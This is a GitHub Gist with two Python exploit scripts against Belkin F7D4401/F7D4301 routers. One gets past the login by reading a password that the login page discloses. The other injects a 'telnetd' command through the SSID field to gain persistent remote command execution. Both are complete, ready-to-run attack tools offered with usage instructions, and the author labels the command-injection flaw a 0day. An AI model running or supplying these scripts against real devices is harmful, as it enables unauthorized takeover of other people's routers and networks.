Created
February 20, 2017 18:01
-
-
Save BigNerd95/c18658b472ac0ccf4dbbc73fe988b683 to your computer and use it in GitHub Desktop.
Belkin router exploits to bypass login and persistent remote command execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Belkin Router Persistent Remote Command Execution (0day) | |
# Tested models: F7D4401, F7D4301 | |
# Tested firmware: 1.00.46 (latest firmware) | |
# You bust be loggedin to run this exploit (you can use belkin_login_bypass.py exploit) | |
# Author BigNerd95 | |
import sys, requests, re | |
def enable_telnetd(ip): | |
print("Getting SSID...") | |
wlPage = requests.get("http://"+ip+"/wireless_id.stm") | |
srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", wlPage.text) | |
if srcSSID: | |
SSID = srcSSID.group(1) | |
#print(SSID) | |
else: | |
print("SSID not found!") | |
exit(1) | |
if ';' in SSID: | |
print("SSID already injected!") | |
exit(1) | |
#cmd = "/usr/sbin/telnetd" | |
cmd = "telnetd" | |
if len(SSID)+1+len(cmd) > 32: | |
print("SSID too long, it will be truncated...") | |
newlen = 32 - len(cmd) - 1 | |
SSID = SSID[0:newlen] | |
newSSID = SSID+"%3B"+cmd | |
print("Injecting SSID...") | |
payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid="+newSSID+"&arc_action=Apply+Changes&wchan=1&ssid="+newSSID | |
ssidInjection = requests.post("http://"+ip+"/apply.cgi", data=payload) | |
err = re.search('countdown\(55\);', ssidInjection.text) | |
if err: | |
print("SSID injected!") | |
else: | |
print("Cannot inject SSID") | |
exit(1) | |
def main(): | |
if len(sys.argv) == 2: | |
enable_telnetd(sys.argv[1]) | |
print("Wait a minute, then run: telnet "+sys.argv[1]) | |
else: | |
print("Usage: "+sys.argv[0]+" <belkin_router_ip>") | |
if __name__ == '__main__': | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Belkin Login Bypass exploit | |
# Tested models: F7D4401, F7D4301 | |
# Tested firmware: 1.00.46 (latest firmware) | |
# Author BigNerd95 | |
import sys, requests, re | |
def auth_bypass(ip): | |
print("Looking for info disclosure...") | |
loginPage = requests.get("http://"+ip+"/login.stm") | |
srcPwd = re.search('var password.*=.*"(.*)";', loginPage.text) | |
if srcPwd: | |
print("Info disclosure found!") | |
loginPwd = srcPwd.group(1) | |
else: | |
print("No info disclosure found!") | |
exit(1) | |
print("Logging in...") | |
payload = "totalMSec=0000000000.000&pws="+loginPwd+"&arc_action=login&pws_temp=&action=Submit" | |
login = requests.post("http://"+ip+"/login.cgi", data=payload) | |
err = re.search('loginpserr.stm', login.text) | |
if not err: | |
print("Logged in!") | |
else: | |
print("Login failed") | |
exit(1) | |
def main(): | |
if len(sys.argv) == 2: | |
auth_bypass(sys.argv[1]) | |
print("Go with your browser to http://"+sys.argv[1]) | |
else: | |
print("Usage: "+sys.argv[0]+" <belkin_router_ip>") | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment